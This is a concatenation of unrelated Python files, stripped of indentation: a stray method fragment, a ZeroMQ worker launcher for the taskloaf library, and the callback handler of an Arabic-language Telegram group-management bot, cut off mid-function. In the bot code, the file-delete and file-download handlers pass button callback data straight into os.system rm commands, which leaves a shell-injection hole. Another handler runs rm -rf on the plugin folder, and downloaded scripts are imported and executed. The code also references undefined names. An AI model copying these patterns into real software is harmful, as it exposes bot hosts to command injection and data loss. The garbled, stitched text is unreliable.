def __is_subprocess(cls):
# notice this class function is called from Task.ExitHooks, do not rename/move it.
is_subprocess = PROC_MASTER_ID_ENV_VAR.get() and \
PROC_MASTER_ID_ENV_VAR.get().split(':')[0] != str(os.getpid())
return is_subprocess
zmq_cluster.py
import random
from contextlib import ExitStack
import multiprocessing
import psutil
import taskloaf as tsk
from taskloaf.cfg import Cfg
from taskloaf.zmq_comm import ZMQComm
from taskloaf.messenger import JoinMeetMessenger
from taskloaf.context import Context
from taskloaf.executor import Executor
import logging
logger = logging.getLogger(__name__)
def random_name():
return random.getrandbits(64)
def zmq_launcher(cfg):
name = random_name()
if cfg.initializer is not None:
cfg.initializer(name, cfg)
logger.info(
f"Setting up ZeroMQ-based worker with name={name}"
f", addr={cfg.addr()}, and cpu_affinity={cfg.affinity}"
)
if cfg.affinity is not None:
psutil.Process().cpu_affinity(cfg.affinity[0])
import signal
import sys
def sigterm_handler(_signo, _stack_frame):
# Raises SystemExit(0):
sys.exit(0)
signal.signal(signal.SIGTERM, sigterm_handler)
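# Join the ZeroMQ mesh: open a socket at cfg.addr(); if cfg.connect_to is set, "meet" an existing
# worker so the JoinMeetMessenger can propagate cluster membership.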
with ZMQComm(cfg.addr()) as comm:
messenger = JoinMeetMessenger(name, comm, True)
messenger.protocol.add_msg_type("COMPLETE", handler=lambda args: None)
if cfg.connect_to is not None:
logger.info(f"Meeting cluster at {cfg.connect_to}")
messenger.meet(cfg.connect_to)
with Context(messenger) as ctx:
tsk.set_ctx(ctx)
# TODO: Make Executor into a context manager
logger.info("launching executor")
ctx.executor = Executor(ctx.messenger.recv, cfg)
if cfg.run is not None:
logger.info(f"with task {cfg.run}")
ctx.executor.start(cfg.run)
class SubprocessWorker:
def __init__(self, cfg):
self.cfg = cfg
self.p = multiprocessing.Process(target=zmq_launcher, args=(cfg,))
def __enter__(self):
self.p.start()
return self
def __exit__(self, exc_type, exc_value, traceback):
# TODO: softer exit?
self.p.terminate()
self.p.join()
class BlockingWorker:
def __init__(self, cfg):
self.cfg = cfg
def start(self):
zmq_launcher(self.cfg)
def zmq_run(*, cfg=None, f=None):
async def f_wrapper():
if f is not None:
result = await tsk.ctx().executor.wait_for_work(f)
tsk.ctx().executor.stop = True
f_wrapper.result = result
f_wrapper.result = None
if cfg is None:
cfg = Cfg()
cfg._build()
with ExitStack() as es:
workers = []
main_cfg = cfg.get_worker_cfg(0)
main_cfg.run = f_wrapper
workers.append(BlockingWorker(main_cfg))
for i in range(1, cfg.n_workers):
workers.append(
es.enter_context(SubprocessWorker(cfg.get_worker_cfg(i)))
)
workers[0].start()
return f_wrapper.result
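# Illustrative usage sketch (not part of the original module). It assumes the default Cfg() is
# sufficient for a local run and that `f` may be an async callable whose return value is passed
# back through f_wrapper.result by zmq_run.
if __name__ == "__main__":
    async def hello():
        return "hello from the main worker"

    print(zmq_run(f=hello))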
callback.py
from utlis.rank import setrank,isrank,remrank,remsudos,setsudo,GPranks,IDrank
from utlis.send import send_msg, BYusers, Sendto, fwdto,Name,Glang,getAge
from utlis.locks import st,getOR,Clang,st_res
from utlis.tg import Bot
from config import *
from pyrogram import ReplyKeyboardMarkup, InlineKeyboardMarkup, InlineKeyboardButton
import threading, requests, time, random, re, json,datetime,os
import importlib
from os import listdir
from os.path import isfile, join
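# Callback dispatcher: callback_query.data is expected to be a JSON-encoded list whose first element
# is the action name (later elements carry action arguments and, usually, the id of the user allowed
# to press the button); payloads that are not valid JSON are forwarded to the dynamically loaded
# modules under ./files that are registered in the "<BOT_ID>Nbot:botfiles" redis set.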
def updateCallback(client, callback_query,redis):
try:
json.loads(callback_query.data)
except Exception as e:
if redis.smembers("{}Nbot:botfiles".format(BOT_ID)):
onlyfiles = [f for f in listdir("files") if isfile(join("files", f))]
filesR = redis.smembers("{}Nbot:botfiles".format(BOT_ID))
for f in onlyfiles:
if f in filesR:
fi = f.replace(".py","")
UpMs= "files."+fi
try:
U = importlib.import_module(UpMs)
t = threading.Thread(target=U.updateCb,args=(client, callback_query,redis))
t.daemon = True
t.start()
importlib.reload(U)
except Exception as e:
pass
return False
if callback_query.inline_message_id:
if redis.smembers("{}Nbot:botfiles".format(BOT_ID)):
onlyfiles = [f for f in listdir("files") if isfile(join("files", f))]
filesR = redis.smembers("{}Nbot:botfiles".format(BOT_ID))
for f in onlyfiles:
if f in filesR:
fi = f.replace(".py","")
UpMs= "files."+fi
try:
U = importlib.import_module(UpMs)
t = threading.Thread(target=U.updateCb,args=(client, callback_query,redis))
t.daemon = True
t.start()
importlib.reload(U)
except Exception as e:
pass
return False
userID = callback_query.from_user.id
chatID = callback_query.message.chat.id
userFN = callback_query.from_user.first_name
title = callback_query.message.chat.title
message_id = callback_query.message.message_id
date = json.loads(callback_query.data)
group = redis.sismember("{}Nbot:groups".format(BOT_ID),chatID)
c = importlib.import_module("lang.arcmd")
r = importlib.import_module("lang.arreply")
if date[0] == "Cordertow":
rank = isrank(redis,userID,chatID)
if (rank is "sudo" or rank is "asudo" or rank is "sudos" or rank is "malk" or rank is "acreator" or rank is "creator" or rank is "owner"):
if redis.sismember("{}Nbot:{}:bans".format(BOT_ID,chatID),date[1]):
GetGprank = GPranks(date[1],chatID)
if GetGprank == "kicked":
Bot("unbanChatMember",{"chat_id":chatID,"user_id":date[1]})
redis.srem("{}Nbot:{}:bans".format(BOT_ID,chatID),date[1])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
return False
if date[0] == "delBL":
Hash = date[1]
chat = date[3]
if redis.sismember("{}Nbot:groups".format(BOT_ID),chat):
redis.delete("{}Nbot:{}:{}".format(BOT_ID,chat,Hash))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if re.search("del(.*)replys$",date[0]):
if int(date[2]) != userID:
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id,"text":r.notforyou,"show_alert":True})
return 0
t = date[0].replace("del","")
if date[1] != "kb":
redis.delete("{}Nbot:{}:{}".format(BOT_ID,date[1],t))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
redis.delete("{}Nbot:{}:{}".format(BOT_ID,chatID,t))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if re.search("del(.*)replysBOT",date[0]):
rank = isrank(redis,userID,chatID)
if rank == "sudo":
t = date[0].replace("del","")
t = t.replace("BOT","")
if date[1] != "kb":
redis.delete("{}Nbot:{}".format(BOT_ID,t))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
redis.delete("{}Nbot:{}".format(BOT_ID,t))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id,"text":r.SudoOnle,"show_alert":True})
if date[0] == "delfromb":
Hash = date[1]
chat = date[3]
if redis.sismember("{}Nbot:groups".format(BOT_ID),chat):
if Hash == "blockanimations":
ID = callback_query.message.animation.file_id
redis.srem("{}Nbot:{}:{}".format(BOT_ID,chat,Hash),ID)
Bot("deleteMessage",{"chat_id":chatID,"message_id":message_id})
if Hash == "blockSTICKERs":
ID = callback_query.message.sticker.file_id
redis.srem("{}Nbot:{}:{}".format(BOT_ID,chat,Hash),ID)
Bot("deleteMessage",{"chat_id":chatID,"message_id":message_id})
if Hash == "blockphotos":
ID = callback_query.message.photo.file_id
redis.srem("{}Nbot:{}:{}".format(BOT_ID,chat,Hash),ID)
Bot("deleteMessage",{"chat_id":chatID,"message_id":message_id})
User_click = int((redis.get("{}Nbot:{}:floodClick".format(BOT_ID,userID)) or 1))
if User_click > 10:
BY = "<a href=\"tg://user?id={}\">{}</a>".format(userID,userFN)
Bot("sendMessage",{"chat_id":chatID,"text":r.banclick.format(BY),"disable_web_page_preview":True,"parse_mode":"html"})
redis.setex("{}Nbot:floodUsers:{}".format(BOT_ID,userID),60*2,"Ban")
redis.delete("{}Nbot:{}:floodClick".format(BOT_ID,userID))
if chatID == userID:
group = True
if group is True and int(date[2]) == userID and not redis.get("{}Nbot:floodUsers:{}".format(BOT_ID,userID)):
if date[0] == "delcheck":
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.notcertain, callback_data=json.dumps(["kickcheck","",userID])),InlineKeyboardButton(r.certain, callback_data=json.dumps(["certain","",userID]))]])
random.shuffle(reply_markup.inline_keyboard[0])
Bot("editMessageText",{"chat_id":chatID,"text":r.ucertain,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "certain":
Bot("restrictChatMember",{"chat_id": chatID,"user_id":userID,"can_send_messages": 1,"can_send_media_messages": 1,"can_send_other_messages": 1,"can_send_polls": 1,"can_change_info": 1,"can_add_web_page_previews": 1,"can_pin_messages": 1,})
T ="<a href=\"tg://user?id={}\">{}</a>".format(userID,Name(userFN))
Bot("editMessageText",{"chat_id":chatID,"text":r.unrestricted.format(T),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
if date[0] == "kickcheck":
Bot("kickChatMember",{"chat_id":chatID,"user_id":userID})
T ="<a href=\"tg://user?id={}\">{}</a>".format(userID,Name(userFN))
crid = redis.get("{}Nbot:{}:creator".format(BOT_ID,chatID))
redis.sadd("{}Nbot:{}:bans".format(BOT_ID,chatID),userID)
reply_markup = InlineKeyboardMarkup([[InlineKeyboardButton(r.Corder, callback_data=json.dumps(["Cordertow",userID]))]])
Bot("editMessageText",{"chat_id":chatID,"text":r.bancheck.format(T),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "delF":
File = date[1]
os.system("rm ./files/"+File)
Bot("editMessageText",{"chat_id":chatID,"text":r.Delfile.format(File),"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
if date[0] == "delFa":
os.system("rm -rf ./files/*")
Bot("editMessageText",{"chat_id":chatID,"text":r.Delfiles,"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
if date[0] == "dlf":
File = date[1]
os.system("rm ./files/"+File)
url = "https://raw.githubusercontent.com/TshAkEAb/TshakeV2-files/master/"+File
out = requests.get(url).text
f = open("./files/"+File,"w+")
f.write(out)
f.close()
Bot("editMessageText",{"chat_id":chatID,"text":r.Dua.format(File),"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
if date[0] == "au":
File = date[1]
if redis.sismember("{}Nbot:botfiles".format(BOT_ID),File):
redis.srem("{}Nbot:botfiles".format(BOT_ID),File)
else:
redis.sadd("{}Nbot:botfiles".format(BOT_ID),File)
onlyfiles = [f for f in listdir("files") if isfile(join("files", f))]
filesR = redis.smembers("{}Nbot:botfiles".format(BOT_ID))
array = []
for f in onlyfiles:
if f in filesR:
s = r.true
else:
s = r.false
array.append([InlineKeyboardButton(f+" "+s,callback_data=json.dumps(["au",f,userID]))])
kb = InlineKeyboardMarkup(array)
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":kb})
if date[0] == "twostepset":
get = date[1]
if get == "eq":
redis.hset("{}Nbot:bancheck:t".format(BOT_ID),chatID,"two")
tx = r.Ttwo
g= "two"
if get == "two":
redis.hdel("{}Nbot:bancheck:t".format(BOT_ID),chatID)
g= "eq"
tx = r.Teq
kb = InlineKeyboardMarkup([[InlineKeyboardButton(r.tset.format(tx),callback_data=json.dumps(["twostepset",g,userID]))]])
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":kb})
if date[0] == "floodset":
get = date[1]
if get == "ban":
redis.hset("{}Nbot:floodset".format(BOT_ID),chatID,"res")
tx = r.Tres
g= "res"
if get == "res":
redis.hset("{}Nbot:floodset".format(BOT_ID),chatID,"ban")
g= "ban"
tx = r.Tban
kb = InlineKeyboardMarkup([[InlineKeyboardButton(r.fset.format(tx),callback_data=json.dumps(["floodset",g,userID]))]])
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":kb})
if date[0] == "delmsgclick":
Bot("deleteMessage",{"chat_id":chatID,"message_id":message_id})
Bot("deleteMessage",{"chat_id":chatID,"message_id":callback_query.message.reply_to_message.message_id})
if date[0] == "ckGPs":
rank = isrank(redis,userID,chatID)
if rank == "sudo":
Bot("editMessageText",{"chat_id":chatID,"text":r.ckpr,"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
IDS = redis.smembers("{}Nbot:groups".format(BOT_ID))
i = 0
for ID in IDS:
get = Bot("getChat",{"chat_id":ID})
if get["ok"] == False:
redis.srem("{}Nbot:groups".format(BOT_ID),ID)
redis.sadd("{}Nbot:disabledgroups".format(BOT_ID),ID)
NextDay_Date = datetime.datetime.today() + datetime.timedelta(days=1)
redis.hset("{}Nbot:disabledgroupsTIME".format(BOT_ID),ID,str(NextDay_Date))
i+=1
time.sleep(0.3)
pr = redis.scard("{}Nbot:privates".format(BOT_ID))
gp = redis.scard("{}Nbot:groups".format(BOT_ID))
Bot("editMessageText",{"chat_id":chatID,"text":r.showstats.format(gp,pr)+r.Dckg.format(i),"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
else:
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id,"text":r.SudoOnle,"show_alert":True})
if date[0] == "Chlang":
name = date[1]
redis.srem("{}Nbot:lang:ar".format(BOT_ID),chatID)
redis.srem("{}Nbot:lang:arem".format(BOT_ID),chatID)
redis.srem("{}Nbot:lang:en".format(BOT_ID),chatID)
redis.sadd("{}Nbot:lang:{}".format(BOT_ID,name),chatID)
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":Clang(client, callback_query,redis,r)})
if date[0] == "ShowDateUser":
t = IDrank(redis,userID,chatID,r)
msgs = (redis.hget("{}Nbot:{}:msgs".format(BOT_ID,chatID),userID) or 0)
edits = (redis.hget("{}Nbot:{}:edits".format(BOT_ID,chatID),userID) or 0)
rate = int(msgs)*100/20000
age = getAge(userID,r)
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(Name(userFN),url="t.me/CCCCCD")],[InlineKeyboardButton(r.Rrank.format(t),url="t.me/CCCCCD")],[InlineKeyboardButton(r.Rmsgs.format(msgs),url="t.me/CCCCCD")],[InlineKeyboardButton(r.Rrate.format(str(rate)+"%"),url="t.me/CCCCCD")],[InlineKeyboardButton(r.Redits.format(edits),url="t.me/CCCCCD")],[InlineKeyboardButton(r.Rage.format(age),url="t.me/CCCCCD")]])
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if re.search("ShowO",date[0]):
T = date[0].replace("ShowO","")
rank = isrank(redis,userID,chatID)
if T == "lock":
reply_markup = getOR(rank,r,userID)
tx = r.LockO
if T == "admin":
reply_markup = getOR(rank,r,userID)
tx = r.AdminO
if T == "owner":
reply_markup = getOR(rank,r,userID)
tx = r.OwnerO
if T == "creator":
reply_markup = getOR(rank,r,userID)
tx = r.CreatorO
if T == "sudos":
reply_markup = getOR(rank,r,userID)
tx = r.SudosO
if T == "sudo":
reply_markup = getOR(rank,r,userID)
tx = r.SudoO
Bot("editMessageText",{"chat_id":chatID,"text":tx,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "sendtogroups":
Bot("editMessageText",{"chat_id":chatID,"text":r.PRsendtoGP,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
done,dont = Sendto(redis,callback_query,"groups")
Bot("editMessageText",{"chat_id":chatID,"text":r.DsendtoGP.format(done,dont),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
redis.delete("{}Nbot:donesend".format(BOT_ID))
redis.delete("{}Nbot:dontsend".format(BOT_ID))
if date[0] == "sendtoprivates":
Bot("editMessageText",{"chat_id":chatID,"text":r.PRsendtoPR,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
done,dont = Sendto(redis,callback_query,"privates")
Bot("editMessageText",{"chat_id":chatID,"text":r.DsendtoPR.format(done,dont),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
redis.delete("{}Nbot:donesend".format(BOT_ID))
redis.delete("{}Nbot:dontsend".format(BOT_ID))
if date[0] == "fwdtogroups":
Bot("editMessageText",{"chat_id":chatID,"text":r.PRsendtoGP,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
done,dont = fwdto(redis,callback_query,"groups")
Bot("editMessageText",{"chat_id":chatID,"text":r.DsendtoGP.format(done,dont),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
redis.delete("{}Nbot:donesend".format(BOT_ID))
redis.delete("{}Nbot:dontsend".format(BOT_ID))
if date[0] == "fwdtoprivates":
Bot("editMessageText",{"chat_id":chatID,"text":r.PRsendtoPR,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
done,dont = fwdto(redis,callback_query,"privates")
Bot("editMessageText",{"chat_id":chatID,"text":r.DsendtoPR.format(done,dont),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
redis.delete("{}Nbot:donesend".format(BOT_ID))
redis.delete("{}Nbot:dontsend".format(BOT_ID))
if date[0] == "kickme-yes":
Bot("kickChatMember",{"chat_id":chatID,"user_id":userID})
Bot("unbanChatMember",{"chat_id":chatID,"user_id":userID})
Bot("editMessageText",{"chat_id":chatID,"text":r.Dkickme,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
if date[0] == "kickme-no":
Bot("editMessageText",{"chat_id":chatID,"text":r.Nkickme,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
if date[0] == "delfromb":
Hash = date[1]
if Hash == "blockanimations":
ID = callback_query.message.animation.file_id
redis.srem("{}Nbot:{}:{}".format(BOT_ID,chatId,TY),ID)
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneUNblock,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "Blocklist":
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(c.STword,callback_data=json.dumps(["showBlocklist","",userID])),InlineKeyboardButton(c.STgifs,url="https://telegram.me/{}?start=showBlocklist={}={}={}".format(Botuser,chatID,userID,"blockanimations")),],[InlineKeyboardButton(c.STphoto,url="https://telegram.me/{}?start=showBlocklist={}={}={}".format(Botuser,chatID,userID,"blockphotos")),InlineKeyboardButton(c.STsticker,url="https://telegram.me/{}?start=showBlocklist={}={}={}".format(Botuser,chatID,userID,"blockSTICKERs")),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.blocklist.format(r.blocklist2,title),"message_id":message_id,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "replylist":
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(c.STword,callback_data=json.dumps(["showreplylist","",userID])),InlineKeyboardButton(c.STgifs,callback_data=json.dumps(["showGFreplylist","",userID])),],[InlineKeyboardButton(c.STvoice,callback_data=json.dumps(["showVOreplylist","",userID])),InlineKeyboardButton(c.STsticker,callback_data=json.dumps(["showSTreplylist","",userID])),],[InlineKeyboardButton("Mp3",callback_data=json.dumps(["showAUreplylist","",userID]))]])
Bot("editMessageText",{"chat_id":chatID,"text":r.blocklist.format(r.replylist,title),"message_id":message_id,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "replylistBOT":
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(c.STword,callback_data=json.dumps(["showreplylistBOT","",userID])),InlineKeyboardButton(c.STgifs,callback_data=json.dumps(["showGFreplylistBOT","",userID])),],[InlineKeyboardButton(c.STvoice,callback_data=json.dumps(["showVOreplylistBOT","",userID])),InlineKeyboardButton(c.STsticker,callback_data=json.dumps(["showSTreplylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.blocklist.format(r.replylistBot,title),"message_id":message_id,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "alllist":
reply_markup=InlineKeyboardMarkup(
[[InlineKeyboardButton(c.STbanall,callback_data=json.dumps(["showbanall","",userID]))
,InlineKeyboardButton(c.STtkall,callback_data=json.dumps(["showtkall","",userID])),]
])
Bot("editMessageText",{"chat_id":chatID,"text":r.banlist,"message_id":message_id,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "delallban":
redis.delete("{}Nbot:bans".format(BOT_ID))
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Ddelbanall,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "delalltk":
redis.delete("{}Nbot:restricteds".format(BOT_ID))
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Ddeltkall,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "showBlocklist":
li = redis.smembers("{}Nbot:{}:blockTEXTs".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - "+word
i += 1
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.BlocklistRm,callback_data=json.dumps(["delListblockTEXTs","",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["Blocklist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["Blocklist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.BlocklistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showbanall":
arrays = redis.smembers("{}Nbot:bans".format(BOT_ID))
if arrays:
b = BYusers(arrays,chatID,redis,client)
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.allbandel,callback_data=json.dumps(["delallban","",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":b,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup,"parse_mode":"markdown"})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.allbanE,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showtkall":
arrays = redis.smembers("{}Nbot:restricteds".format(BOT_ID))
if arrays:
b = BYusers(arrays,chatID,redis,client)
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.alltkdel,callback_data=json.dumps(["delalltk","",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":b,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup,"parse_mode":"markdown"})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.alltkE,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showreplylist":
li = redis.hkeys("{}Nbot:{}:TXreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"TXreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.replylistRm,callback_data=json.dumps(["delTXreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.replylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showAUreplylist":
li = redis.hkeys("{}Nbot:{}:AUreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"AUreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("📂꒐ قائمة الصوتيات فارغة",callback_data=json.dumps(["delSTreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":"📂꒐ قائمة الصوتيات فارغة","message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showSTreplylist":
li = redis.hkeys("{}Nbot:{}:STreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"STreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.STreplylistRm,callback_data=json.dumps(["delSTreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.STreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showGFreplylist":
li = redis.hkeys("{}Nbot:{}:GFreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"GFreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.GFreplylistRm,callback_data=json.dumps(["delGFreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.GFreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showVOreplylist":
li = redis.hkeys("{}Nbot:{}:VOreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"VOreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.VOreplylistRm,callback_data=json.dumps(["delVOreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
